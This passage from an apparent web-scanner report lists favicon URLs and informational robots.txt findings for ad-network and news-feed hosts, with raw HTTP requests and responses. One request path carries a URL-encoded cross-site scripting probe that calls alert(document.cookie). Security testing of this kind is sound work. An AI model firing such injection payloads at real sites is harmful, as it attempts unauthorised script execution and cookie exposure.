http://www.trumpinitiative.com/favicon.ico
http://www.trustedhomeservices.com/favicon.ico
http://www.tubedaddy.net/favicon.ico
http://www.tubeguide.info/favicon.ico
http://www.tucsonweekly.com/favicon.ico
http://www.tunecore.com/favicon.ico
http://www.turnbacktogod.com/favicon.ico
http://www.tvb.com/favicon.ico
http://www.tvrepairman.com/favicon.ico
http://www.twilightersanonymous.com/favicon.ico
http://www.twoofus.org/favicon.ico
http://www.ualmileageplus.com/favicon.ico
http://www.ueuo.com/favicon.ico
http://www.ul.com/favicon.ico
http://www.ultimate-penis-enlargement-guide.com/favicon.ico
http://www.umassonline.net/favicon.ico
http://www.uniqlo.com/favicon.ico
http://www.uniquedaily.com/favicon.ico
http://www.unknowncountry.com/favicon.ico
http://www.upmystreet.com/favicon.ico
http://www.uprinting.com/favicon.ico
http://www.upskirtphotos.org/favicon.ico
http://www.urbanministry.org/favicon.ico
http://www.ureader.de/favicon.ico
http://www.urnotalone.com/favicon.ico
http://www.us-funerals.com/favicon.ico
http://www.usa-gymnastics.org/favicon.ico
http://www.usacitiesonline.com/favicon.ico
http://www.usafootball.com/favicon.ico
http://www.usagovernmentgrants.org/favicon.ico
http://www.usamilitarymedals.com/favicon.ico
http://www.usapaydayassistance.net/favicon.ico
http://www.usatourist.com/favicon.ico
http://www.usavacuum.com/favicon.ico
http://www.uschess.org/favicon.ico
http://www.usedforsale.biz/favicon.ico
http://www.userfriendly.org/favicon.ico
http://www.usherbrooke.ca/favicon.ico
http://www.uwstout.edu/favicon.ico
http://www.uzitalk.com/favicon.ico
http://www.vacapedia.com/favicon.ico
http://www.vacationrentalsad.com/favicon.ico
http://www.valueapproved.info/favicon.ico
http://www.vampfangs.com/favicon.ico
http://www.vanguardmil.com/favicon.ico
http://www.vegastripping.com/favicon.ico
http://www.veoliaes-sw.com/favicon.ico
http://www.verizonbusiness.com/favicon.ico
http://www.videora.com/favicon.ico
http://www.vikingrivers.com/favicon.ico
http://www.vincelewis.net/favicon.ico
http://www.virtualdj.com/favicon.ico
http://www.virtualrabbit.com/favicon.ico
http://www.visitmaine.net/favicon.ico
http://www.visitmayberry.com/favicon.ico
http://www.visitsouth.com/favicon.ico
http://www.vivareal.us/favicon.ico
http://www.vividracing.com/favicon.ico
http://www.voa.org/favicon.ico
http://www.vva.org/favicon.ico
http://www.wackyplanet.com/favicon.ico
http://www.warbirdinformationexchange.org/favicon.ico
http://www.warriortalk.com/favicon.ico
http://www.washingtonflyfishing.com/favicon.ico
http://www.watchcartoononline.com/favicon.ico
http://www.watchforeclosure.com/favicon.ico
http://www.watts.com/favicon.ico
http://www.wbu.com/favicon.ico
http://www.wccls.org/favicon.ico
http://www.wcsh6.com/favicon.ico
http://www.wcwelding.com/favicon.ico
http://www.wdasfm.com/favicon.ico
http://www.we7.com/favicon.ico
http://www.web-stat.net/favicon.ico
http://www.webdesign.org/favicon.ico
http://www.webreference.com/favicon.ico
http://www.wect.com/favicon.ico
http://www.weldershop.info/favicon.ico
http://www.wellnessletter.com/favicon.ico
http://www.wengers.com/favicon.ico
http://www.werdyo.com/favicon.ico
http://www.werner.com/favicon.ico
http://www.westathome.com/favicon.ico
http://www.westendmotorsports.com/favicon.ico
http://www.westport-news.com/favicon.ico
http://www.whatsonxiamen.com/favicon.ico
http://www.wheelessonline.com/favicon.ico
http://www.wholesalecostumeclub.com/favicon.ico
http://www.wholesaledir.com/favicon.ico
http://www.wholesalefloral.com/favicon.ico
http://www.whonamedit.com/favicon.ico
http://www.wichealth.org/favicon.ico
http://www.wideanglesoftware.com/favicon.ico
http://www.wikifeet.com/favicon.ico
http://www.wildernesscollege.com/favicon.ico
http://www.willistonherald.com/favicon.ico
http://www.willyouhost.com/favicon.ico
http://www.windows-vista-update.com/favicon.ico
http://www.windsorstore.com/favicon.ico
http://www.wingstuff.com/favicon.ico
http://www.winhelponline.com/favicon.ico
http://www.winnipesaukee.com/favicon.ico
http://www.wireless-driver.com/favicon.ico
http://www.wofford.edu/favicon.ico
http://www.womensenews.org/favicon.ico
http://www.wood-stove.org/favicon.ico
http://www.woodheat.org/favicon.ico
http://www.woodnet.net/favicon.ico
http://www.woodsmith.com/favicon.ico
http://www.woodworking.com/favicon.ico
http://www.woodworking4home.com/favicon.ico
http://www.woodys-auto-supply.com/favicon.ico
http://www.wordplays.com/favicon.ico
http://www.worksourceoregon.org/favicon.ico
http://www.world-import.com/favicon.ico
http://www.worldgroups.com/favicon.ico
http://www.worldwidedx.com/favicon.ico
http://www.wrestlewithjimmy.net/favicon.ico
http://www.wrhardware.com/favicon.ico
http://www.wri.org/favicon.ico
http://www.wrinklebest.com/favicon.ico
http://www.wten.com/favicon.ico
http://www.wwwamericanclassifieds.com/favicon.ico
http://www.x-tremegeek.com/favicon.ico
http://www.xaapa.com/favicon.ico
http://www.xstreetsl.com/favicon.ico
http://www.yardbarker.com/javascripts/all.js
http://www.ymlp163.com/favicon.ico
http://www.ymlp188.com/favicon.ico
http://www.youhoro.info/favicon.ico
http://www.youreviewelectronics.com/favicon.ico
http://www.youthfire.com/favicon.ico
http://www.yuddy.com/favicon.ico
http://www.zapak.com/favicon.ico
http://www.zara.com/favicon.ico
http://www.zdnetasia.com/favicon.ico
http://www.zegeridotc.com/favicon.ico

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

26.1. http://a.tribalfusion.com/displayAd.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/displayAd.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.2. http://ad.doubleclick.net/ad/tnews.lee.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/tnews.lee.net/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Tue, 03 May 2011 15:41:23 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

26.3. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Tue, 03 May 2011 15:41:32 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.4. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:12da"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 03 May 2011 15:43:36 GMT
Connection: close

User-agent: *
Disallow: /

26.5. http://ads.specificmedia.com/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.specificmedia.com
Path:	/serve/v=5

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:11 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Wed, 04 Jun 2008 14:17:35 GMT
ETag: "147001b-1a-44ed7e3e1bdc0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.6. http://as.casalemedia.com/j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.casalemedia.com
Path:	/j

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Oct 2010 18:16:00 GMT
ETag: "17b0172-1a-afb800"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Tue, 03 May 2011 15:41:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:56 GMT
Connection: close

User-agent: *
Disallow: /

26.7. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 04 May 2011 15:41:33 GMT
Date: Tue, 03 May 2011 15:41:33 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

26.8. http://b.voicefive.com/b2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 04 May 2011 15:42:35 GMT
Date: Tue, 03 May 2011 15:42:35 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

26.9. http://c.betrad.com/surly.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.betrad.com
Path:	/surly.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Tue, 03 May 2011 15:41:32 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

26.10. http://cache.specificmedia.com/creative/blank.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/creative/blank.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:15 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n27 ( iad-agg-n7), ht-d iad-agg-n7.panthercdn.com
ETag: "136636e-1a-44ed7e3e1bdc0"
Cache-Control: max-age=604800
Expires: Mon, 09 May 2011 13:33:58 GMT
Age: 94097
Content-Length: 26
Content-Type: text/plain
Last-Modified: Wed, 04 Jun 2008 14:17:35 GMT
Connection: close

User-agent: *
Disallow: /

26.11. http://cdn.optmd.com/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.optmd.com
Path:	/blank.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.optmd.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Fri, 24 Jun 2005 22:51:33 GMT
ETag: "88402f-1a-a4b8c740"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 03 May 2011 15:41:59 GMT
Connection: close

User-agent: *
Disallow: /

26.12. http://cdn.turn.com/server/ddc.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Tue, 03 May 2011 15:41:33 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.13. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2011 15:41:38 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.14. http://cms.quantserve.com/dpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.quantserve.com
Path:	/dpixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cms.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 04 May 2011 15:42:40 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 03 May 2011 15:42:40 GMT
Server: QS

User-agent: *
Disallow: /

26.15. http://crl.geotrust.com/crls/secureca.crl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://crl.geotrust.com
Path:	/crls/secureca.crl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: crl.geotrust.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 17:05:23 GMT
Content-Length: 26
Content-Type: text/plain

User-agent: *
Disallow: /

26.16. http://d.xp1.ru4.com/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.xp1.ru4.com

Response

26.17. http://d13.zedo.com/OzoDB/cutils/R53_5/jsc/1190/zpu.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d13.zedo.com
Path:	/OzoDB/cutils/R53_5/jsc/1190/zpu.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d13.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1385281220
Date: Tue, 03 May 2011 15:41:10 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.18. http://d3.zedo.com/jsc/d3/ff2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/jsc/d3/ff2.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1131474873
Date: Tue, 03 May 2011 15:41:10 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.19. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 343268296
Date: Tue, 03 May 2011 15:40:44 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.20. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=909
Expires: Tue, 03 May 2011 16:24:19 GMT
Date: Tue, 03 May 2011 16:09:10 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

26.21. http://idpix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idpix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: idpix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Tue, 03 May 2011 15:41:32 GMT
Connection: close

# go away
User-agent: *
Disallow: /

26.22. http://img0.yardbarker.com/media/f/8/f832476d611c0dd18e2d227a2c52ddeb172fe41a/footer_story/charlie-batch.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img0.yardbarker.com
Path:	/media/f/8/f832476d611c0dd18e2d227a2c52ddeb172fe41a/footer_story/charlie-batch.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img0.yardbarker.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.35
Content-Type: text/plain
Content-Length: 141
Last-Modified: Mon, 04 Oct 2010 18:45:29 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 17:09:24 GMT
Connection: close

User-agent: *
# old paths, don't follow
Disallow: /teams/*
Disallow: /players/*
Disallow: /users/*

Disallow: /forum/*

Disallow: /account/*

26.23. http://img1.yardbarker.com/media/e/a/ea5193d9ec768455228a325516c165fd5e1f9b08/footer_story/Kansas_City_Chiefs_aab2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img1.yardbarker.com
Path:	/media/e/a/ea5193d9ec768455228a325516c165fd5e1f9b08/footer_story/Kansas_City_Chiefs_aab2.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img1.yardbarker.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.35
Content-Type: text/plain
Content-Length: 141
Last-Modified: Mon, 04 Oct 2010 18:45:29 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 17:09:25 GMT
Connection: close

User-agent: *
# old paths, don't follow
Disallow: /teams/*
Disallow: /players/*
Disallow: /users/*

Disallow: /forum/*

Disallow: /account/*

26.24. http://img2.yardbarker.com/media/4/0/405e6a02aee3eecae135f27fbf734dcc55320c07/medium/Philadelphia_Eagles_v_d8c9.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img2.yardbarker.com
Path:	/media/4/0/405e6a02aee3eecae135f27fbf734dcc55320c07/medium/Philadelphia_Eagles_v_d8c9.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img2.yardbarker.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.35
Content-Type: text/plain
Content-Length: 141
Last-Modified: Mon, 04 Oct 2010 18:45:29 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 17:09:46 GMT
Connection: close

User-agent: *
# old paths, don't follow
Disallow: /teams/*
Disallow: /players/*
Disallow: /users/*

Disallow: /forum/*

Disallow: /account/*

26.25. http://img3.yardbarker.com/media/f/0/f000fbdc84ba51062eb26c6ba07cf0c827a59f4a/footer_story/Baltimore_Ravens_v_79ff.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img3.yardbarker.com
Path:	/media/f/0/f000fbdc84ba51062eb26c6ba07cf0c827a59f4a/footer_story/Baltimore_Ravens_v_79ff.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img3.yardbarker.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.35
Content-Type: text/plain
Content-Length: 141
Last-Modified: Mon, 04 Oct 2010 18:45:29 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 17:09:23 GMT
Connection: close

User-agent: *
# old paths, don't follow
Disallow: /teams/*
Disallow: /players/*
Disallow: /users/*

Disallow: /forum/*

Disallow: /account/*

26.26. http://jkleman.townnews.com/media4/mcfarland/service/right_small.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jkleman.townnews.com
Path:	/media4/mcfarland/service/right_small.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jkleman.townnews.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Tue, 03 May 2011 15:41:15 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=4999
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
X-Cache-Info: caching
Real-Hostname: jkleman.townnews.com
Content-Length: 1150

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

26.27. http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leeenterprises.112.2o7.net
Path:	/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: leeenterprises.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:48 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "25d19a-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www120
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.28. http://m1.zedo.com/log/p.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m1.zedo.com
Path:	/log/p.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1717264003
Date: Tue, 03 May 2011 15:41:18 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.29. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:12:05 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=87961872
Expires: Fri, 14 Feb 2014 18:00:21 GMT
Date: Tue, 03 May 2011 16:09:09 GMT
Connection: close

User-agent: *
Disallow: /

26.30. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-01-0VIaSjnOLg.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 04 May 2011 15:41:30 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 03 May 2011 15:41:30 GMT
Server: QS

User-agent: *
Disallow: /

26.31. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Tue, 03 May 2011 15:41:40 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r1-ads.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 15:40:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 03 May 2011 15:40:48 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

26.33. http://spe.atdmt.com/ds/DECHOJANSLEE/Lee_Misses_Shopphobia_9_7_10/lee_shopphobic_men_300x250_35k_v3a.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/ds/DECHOJANSLEE/Lee_Misses_Shopphobia_9_7_10/lee_shopphobic_men_300x250_35k_v3a.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Thu, 05 May 2011 12:05:49 GMT
Date: Tue, 03 May 2011 15:42:04 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

26.34. http://speed.pointroll.com/PointRoll/Media/Banners/USCellular/865245/USC_familyplan_eric_300x250.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://speed.pointroll.com
Path:	/PointRoll/Media/Banners/USCellular/865245/USC_familyplan_eric_300x250.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:43:37 GMT
Connection: close

User-agent: *
Disallow: /

26.35. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x3 pid 0x3ece 16078
